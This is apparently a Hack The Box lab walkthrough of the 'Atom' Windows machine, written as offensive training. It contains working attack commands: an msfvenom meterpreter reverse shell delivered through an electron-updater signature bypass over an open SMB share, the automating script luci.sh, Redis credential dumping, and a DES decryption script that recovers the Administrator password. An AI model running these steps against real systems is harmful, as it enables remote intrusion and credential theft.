Hack-The-Box-walkthrough[Atom]

Introduction

OS: Windows
Difficulty: Medium
Points: 30
Release: 17 Apr 2021
IP: 10.10.10.237


Information gathering

First, run nmap as usual.

┌──(root💀kali)-[~/hackthebox/machine/atom]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.237
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
135/tcp open msrpc Microsoft Windows RPC
443/tcp open ssl/http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
6379/tcp open redis Redis key-value store
7680/tcp open pando-pub?
Service Info: Host: ATOM; OS: Windows; CPE: cpe:/o:microsoft:windows

Port-80

There is a simple HTML page.

Let’s check https 443 port.

Port 443 serves the same page as port 80, so nothing interesting there.

Next, let's enumerate the SMB shares with smbclient.

┌──(root💀kali)-[~/hackthebox/machine/atom]
└─# smbclient -L \\10.10.10.237 -U ""
Enter WORKGROUP\'s password:

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Software_Updates Disk
SMB1 disabled -- no workgroup available

We have an interesting share called Software_Updates; let's check what's inside.

┌──(root💀kali)-[~/hackthebox/machine/atom]
└─# smbclient -N "\\\\10.10.10.237\Software_Updates"
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Apr 23 10:30:59 2021
.. D 0 Fri Apr 23 10:30:59 2021
client1 D 0 Fri Apr 23 10:30:59 2021
client2 D 0 Fri Apr 23 10:30:59 2021
client3 D 0 Fri Apr 23 10:30:59 2021
UAT_Testing_Procedures.pdf A 35202 Fri Apr 9 07:18:08 2021

4413951 blocks of size 4096. 1363676 blocks available
smb: \>

The client folders are empty, but there is a PDF file. Let's grab it.

smb: \> get UAT_Testing_Procedures.pdf
getting file \UAT_Testing_Procedures.pdf of size 35202 as UAT_Testing_Procedures.pdf (6.2 KiloBytes/sec) (average 6.2 KiloBytes/sec)

After reading the PDF I learned that an update can be placed in any client folder, and an automated script picks it up and checks it.

So if we place a reverse shell in place of the update, we get a shell back; but for that we need to bypass the update's signature validation.

Searching Google for an electron-builder exploit turned up a good blog post:

  • Signature Validation Bypass Leading to RCE In Electron-Updater

After reading the blog I understood how to bypass the signature check and get a reverse shell.

I use msfvenom to create the reverse shell.

┌──(root💀kali)-[~/hackthebox/machine/atom]
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.3 LPORT=9001 -f exe -o "r'luci.exe"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: r'luci.exe

┌──(root💀kali)-[~/hackthebox/machine/atom]
└─# shasum -a 512 "r'luci.exe" | cut -d " " -f1 | xxd -r -p | base64 -w 0
xgDIC+MoZUuufkz10OlxptRGT8HR+z9vxdoL/4FZ/3JMG6NRKz7DK7B69BkolIORVfwDyVnxUUebyHp9vEtbAw==

We have the hash; now let's start msfconsole to catch the reverse shell.

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.3
LHOST => 10.10.14.3
msf6 exploit(multi/handler) > set lport 9001
lport => 9001
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.3:9001

Now we need to create a file called latest.yml with our hash inside it. This sha512 value is what the updater compares the downloaded file against, so the check passes for any file whose hash we write here.

  • latest.yml
version: 1.2.3
path: http://10.10.14.3/r'luci.exe
sha512: xgDIC+MoZUuufkz10OlxptRGT8HR+z9vxdoL/4FZ/3JMG6NRKz7DK7B69BkolIORVfwDyVnxUUebyHp9vEtbAw==

Now start a Python HTTP server on port 80 and we are good to go.

┌──(root💀kali)-[~/hackthebox/machine/atom]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

The last step is to put the file inside the client1 or client2 folder; either works.

┌──(root💀kali)-[~/hackthebox/machine/atom]
└─# smbclient //10.10.10.237/Software_Updates/ -U " "
Enter WORKGROUP\ 's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Apr 23 11:01:33 2021
.. D 0 Fri Apr 23 11:01:33 2021
client1 D 0 Fri Apr 23 11:01:33 2021
client2 D 0 Fri Apr 23 11:01:33 2021
client3 D 0 Fri Apr 23 11:01:33 2021
UAT_Testing_Procedures.pdf A 35202 Fri Apr 9 07:18:08 2021

4413951 blocks of size 4096. 1363764 blocks available
smb: \> cd client2
smb: \client2\> put latest.yml
putting file latest.yml as \client2\latest.yml (0.1 kb/s) (average 0.1 kb/s)
smb: \client2\>

After uploading the file, wait about 10 seconds and the reverse shell arrives in Metasploit.

┌──(root💀kali)-[~/hackthebox/machine/atom]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.237 - - [23/Apr/2021 11:03:31] code 404, message File not found
10.10.10.237 - - [23/Apr/2021 11:03:31] "GET /r'luci.exe.blockmap HTTP/1.1" 404 -
10.10.10.237 - - [23/Apr/2021 11:03:31] "GET /r%27luci.exe HTTP/1.1" 200 -
meterpreter > getuid
Server username: ATOM\jason

Boom, we got the shell.

I will also share a bash script that automates getting the reverse shell.

  • luci.sh
#!/bin/bash
# Attacker IP on the HTB VPN interface
IP=$(ifconfig tun0 | grep -w inet | awk '{print $2}')
msfvenom -p windows/meterpreter/reverse_tcp LHOST="$IP" LPORT=9001 -f exe -o "r'luci.exe"
# base64 of the raw SHA-512 digest, the format latest.yml expects; hash the file just built
KEY=$(shasum -a 512 "r'luci.exe" | cut -d " " -f1 | xxd -r -p | base64 -w 0)
# overwrite (not append) latest.yml so a rerun does not leave stale entries behind
cat <<EOF > latest.yml
version: 1.2.3
path: http://$IP/r'luci.exe
sha512: $KEY
EOF
smbclient //10.10.10.237/Software_Updates/ -U " "%" " -c "cd client2;put latest.yml"
python3 -m http.server 80
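As an added example (not code from this write-up or from electron-updater), the following Python builds a latest.yml the same way luci.sh does and then performs the integrity check the updater runs on the download: the SHA-512 of the fetched file must equal the sha512 field. The payload bytes are a constructed stand-in; the URL and version are the ones used above.

```python
import base64
import hashlib
import hmac
import re

# Constructed stand-in for the payload body; the URL is the one used in the write-up.
SAMPLE_EXE = b"MZ" + b"\x00" * 62 + b"constructed stand-in for an exe body\n"
SAMPLE_URL = "http://10.10.14.3/r'luci.exe"


def sha512_b64(data: bytes) -> str:
    """SHA-512 digest as base64, identical to the shell pipeline
    shasum -a 512 FILE | cut -d ' ' -f1 | xxd -r -p | base64 -w 0"""
    return base64.b64encode(hashlib.sha512(data).digest()).decode("ascii")


def build_latest_yml(version: str, url: str, data: bytes) -> str:
    """Write the three fields luci.sh puts in latest.yml."""
    return f"version: {version}\npath: {url}\nsha512: {sha512_b64(data)}\n"


def parse_latest_yml(text: str) -> dict:
    """Minimal parser for the flat key: value lines used here (no yaml dependency)."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"^(version|path|sha512):\s*(.+?)\s*$", line)
        if m:
            fields[m.group(1)] = m.group(2)
    return fields


def verify_update(yml_text: str, downloaded: bytes) -> bool:
    """The integrity check: digest of the download must equal the sha512 field.
    Constant-time compare; returns False when the field is missing."""
    expected = parse_latest_yml(yml_text).get("sha512")
    if expected is None:
        return False
    return hmac.compare_digest(expected, sha512_b64(downloaded))


if __name__ == "__main__":
    yml = build_latest_yml("1.2.3", SAMPLE_URL, SAMPLE_EXE)
    print(yml)
    print("unmodified download passes:", verify_update(yml, SAMPLE_EXE))
    print("tampered download passes:  ", verify_update(yml, SAMPLE_EXE + b"\x90"))
```

Passing this check only shows that the file matches whatever latest.yml says; it proves nothing about who produced either one, which is why the separate signature validation is the control that matters.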

Now let’s get our user.txt file.

meterpreter > shell
Process 3512 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19042.906]
(c) Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>cd \Users\jason\Desktop
cd \Users\jason\Desktop

C:\Users\jason\Desktop>type user.txt
type user.txt
4c012cd118f6c7e788a1fac97663223f

Privilege escalation

Let's run winPEAS.

  • winPEASx64.exe

winPEAS turned up two interesting things: a file called redis.windows-service.conf and a running service called redis-server.

First let’s get the file and see what’s inside.

C:\Users\jason\Desktop>cd C:\Program Files\Redis\
cd C:\Program Files\Redis\

C:\Program Files\Redis>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9793-C2E6

Directory of C:\Program Files\Redis

04/23/2021 02:30 AM <DIR> .
04/23/2021 02:30 AM <DIR> ..
07/01/2016 03:54 PM 1,024 EventLog.dll
04/02/2021 07:31 AM <DIR> Logs
07/01/2016 03:52 PM 12,618 Redis on Windows Release Notes.docx
07/01/2016 03:52 PM 16,769 Redis on Windows.docx
07/01/2016 03:55 PM 406,016 redis-benchmark.exe
07/01/2016 03:55 PM 4,370,432 redis-benchmark.pdb
07/01/2016 03:55 PM 257,024 redis-check-aof.exe
07/01/2016 03:55 PM 3,518,464 redis-check-aof.pdb
07/01/2016 03:55 PM 268,288 redis-check-dump.exe
07/01/2016 03:55 PM 3,485,696 redis-check-dump.pdb
07/01/2016 03:55 PM 482,304 redis-cli.exe
07/01/2016 03:55 PM 4,517,888 redis-cli.pdb
07/01/2016 03:55 PM 1,553,408 redis-server.exe
07/01/2016 03:55 PM 6,909,952 redis-server.pdb
04/02/2021 07:39 AM 43,962 redis.windows-service.conf
04/02/2021 07:37 AM 43,960 redis.windows.conf
07/01/2016 09:17 AM 14,265 Windows Service Documentation.docx
16 File(s) 25,902,070 bytes
3 Dir(s) 5,583,278,080 bytes free

C:\Program Files\Redis>type redis.windows-service.conf
type redis.windows-service.conf
# Redis configuration file example
requirepass kidvscat_yes_kidvscat
......

I found a password -> kidvscat_yes_kidvscat

With this password we can connect to the redis-server.

If you don't have redis-cli yet, install it with this command:

apt-get install redis-tools

Here is a cheatsheet of redis-cli commands:

  • redis_cheatsheet

Now let's connect to the server and list the keys.

┌──(root💀kali)-[~/hackthebox/machine/atom]
└─# redis-cli -h 10.10.10.237 -a kidvscat_yes_kidvscat
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
10.10.10.237:6379> keys *
1) "pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff"
2) "pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0"
3) "pk:ids:User"
4) "pk:ids:MetaDataClass"

Let's look at the first user, because the first user is always the admin.

10.10.10.237:6379> get pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0
"{\"Id\":\"e8e29158d70d44b1a1ba4949d52790a0\",\"Name\":\"Administrator\",\"Initials\":\"\",\"Email\":\"\",\"EncryptedPassword\":\"Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi\",\"Role\":\"Admin\",\"Inactive\":false,\"TimeStamp\":637530169606440253}"

We got the EncryptedPassword value:

Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi

Now the question is how to crack or decrypt this hash.

I checked the winPEAS results again and found something useful.

I downloaded and read the PDF.

After reading it I understood that PortableKanban stores all its settings and the encrypted password.

Let's search Google for a PortableKanban exploit.

  • PortableKanban Encrypted Password Disclosure
  • Python3 Script
    Found a python3 script for Encrypted Password Disclosure.

With this script I can decrypt the hash.

The problem is that the script requires a file called PortableKanban.pk3, so I modified it for our use case.

  • decrypt.py
import base64
from des import DesKey  # python3 -m pip install des

# DES-CBC key and IV taken from the PortableKanban disclosure script
KEY = b"7ly6UznJ"
IV = b"XuVUm5fR"


def decrypt_password(encrypted: str) -> str:
    """Base64-decode the EncryptedPassword value from redis and DES-CBC decrypt it."""
    raw = base64.b64decode(encrypted.encode("utf-8"))
    key = DesKey(KEY)
    return key.decrypt(raw, initial=IV, padding=True).decode("utf-8")


if __name__ == "__main__":
    try:
        enc = input("Enter the Hash : ").strip()
        print("Decrypted Password : " + decrypt_password(enc))
    except Exception:
        print("Wrong Hash")

Before running the script, install its dependency with this command:

pip3 install des

Now we are ready to decrypt the hash.

┌──(root💀kali)-[~/hackthebox/machine/atom]
└─# python3 decrypt.py
Enter the Hash : Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi
Decrypted Password : kidvscat_admin_@123

And we got the password of Administrator -> kidvscat_admin_@123

Now let’s login with evil-winrm.

┌──(root💀kali)-[~/hackthebox/machine/atom]
└─# evil-winrm -i 10.10.10.237 -u 'administrator' -p 'kidvscat_admin_@123'

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
atom\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
6c3c26123ed7d7eae41b18343707d229

Summary of knowledge

  • SMB share accessible without credentials
  • Signature Validation Bypass Leading to RCE In Electron-Updater
  • PortableKanban Encrypted Password Disclosure (crack the hash inside redis)

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I'm lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security researcher, hacker, bug hunter and more…